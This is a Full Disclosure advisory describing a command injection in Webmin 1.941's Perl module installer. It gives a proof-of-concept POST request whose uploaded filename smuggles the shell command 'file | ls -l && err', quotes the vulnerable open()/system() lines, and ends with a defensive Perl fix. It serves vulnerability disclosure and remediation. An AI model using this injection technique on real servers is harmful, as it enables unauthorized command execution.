Full Disclosure mailing list archives
Webmin (Upload Module) Remote Command Injection Vulnerability
From: raki ben hamouda <raki7bh () gmail com>
Date: Wed, 6 May 2020 08:47:23 +0200
Document Title:
===============
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability

Common Vulnerability Scoring System:
====================================
8.5

Vulnerability Class:
====================
Command Injection

Current Estimated Price:
========================
2.000€ - 3.000€

Affected Product(s):
====================
Webmin

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote authenticated command injection vulnerability has been discovered in the official Webmin product. The vulnerability allows a remote attacker with only permission to the "Install Module" Perl component to execute arbitrary operating system commands. This is because no check is performed on the user-supplied "upload" parameter before it is passed to the Perl open() function, so any command embedded in it is executed.

The vulnerability is located in the `/cpan/download.cgi` module, in the `upload` parameter that carries the name of the module to install.

The security risk of the arbitrary RCE vulnerability is estimated as High with a CVSS (Common Vulnerability Scoring System) count of 8.5. Exploitation of the RCE web vulnerability requires a low-privileged web-application user account and no user interaction. Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.

===============================
## When digging in the code:
I needed only to reach this line of code to make it work:

&install_error(&text('download_etar', "<tt>$tar</tt>"));

However, passing user input directly to open() is not a solution; this also includes all of these lines:

open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
system("$cmd >/dev/null 2>&1 </dev/null");
%needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;

=============================
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /cpan/download.cgi

Vulnerable Parameter(s):
[+] upload

Server version 1.941

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by a remote attacker with a low-privileged web-application user account and no user interaction. For a security demonstration, or to reproduce the vulnerability, follow the information and steps provided below.

1- The attacker must have permission to the Install Perl Modules component.
2- Go to "Others" -> "Perl Modules" -> "Install Modules" -> select 'From Uploaded File' -> pick any file.
3- The attacker intercepts the request that follows:

--- PoC Session Logs [POST] ---
POST /cpan/download.cgi HTTP/1.1
Host: 192.168.239.129:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------7478318236766462923988573986
Content-Length: 682
Origin: https://192.168.239.129:10000
Connection: close
Referer: https://192.168.239.129:10000/cpan/?xnavigation=1
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7

-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="cpan"

-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="local"

-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="source"

1
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="upload"; filename="file | ls -l && err"
Content-Type: [nothing here]

[Nothing Here]
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="url"

-----------------------------7478318236766462923988573986--

4- Modify the "upload" parameter with the string: "file | ls -l && err"

## Successfully reproduced the vulnerability.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
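The defensive counterpart of the two-argument pipe open() quoted in the advisory, as an added Perl example that is not Webmin's code: the uploaded file name is allow-listed before use, and the tarball is listed with the list form of open(), which runs tar directly so no shell ever sees the name. $upload_dir, safe_module_name and list_tar_contents are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example (not Webmin's code): safe handling of an uploaded module
# file name before it reaches a pipe open(). Assumes the upload has already
# been saved under $upload_dir; the names below are hypothetical.
use strict;
use warnings;
use File::Basename qw(basename);

my $upload_dir = '/tmp/cpan-uploads';   # assumed location of saved uploads

# Accept only a conservative file name: no shell metacharacters, no path
# separators, and it must look like a CPAN tarball. The capture also
# untaints the value under -T.
sub safe_module_name {
    my ($name) = @_;
    $name = basename($name);             # drop any client-supplied path
    return undef unless $name =~ /\A([A-Za-z0-9._-]+\.tar\.gz)\z/;
    return $1;
}

# List tarball contents without building a shell command line.
# The list form of open() executes tar directly, so "|", "&&" and
# friends in the name are literal bytes, not shell operators.
sub list_tar_contents {
    my ($name) = @_;
    my $safe = safe_module_name($name);
    die "rejected upload name: $name\n" unless defined $safe;
    my $path = "$upload_dir/$safe";
    open(my $tar, '-|', 'tar', '-tzf', $path) or die "cannot run tar: $!";
    my @entries = <$tar>;
    close($tar);
    chomp @entries;
    return @entries;
}

# Contrast with the vulnerable two-argument form the advisory quotes, where
# the file name is interpolated into a string handed to /bin/sh:
#   open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");   # do not use

if (!caller) {
    for my $n ('Some-Module-1.00.tar.gz', 'file | ls -l && err') {
        my $ok = safe_module_name($n);
        printf "%-28s -> %s\n", "\"$n\"",
            defined $ok ? "accepted ($ok)" : "rejected";
    }
}
```

Run stand-alone, the script shows the ordinary tarball name accepted and the advisory's payload rejected before any process is spawned.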
Current thread:
- Webmin (Upload Module) Remote Command Injection Vulnerability raki ben hamouda (May 08)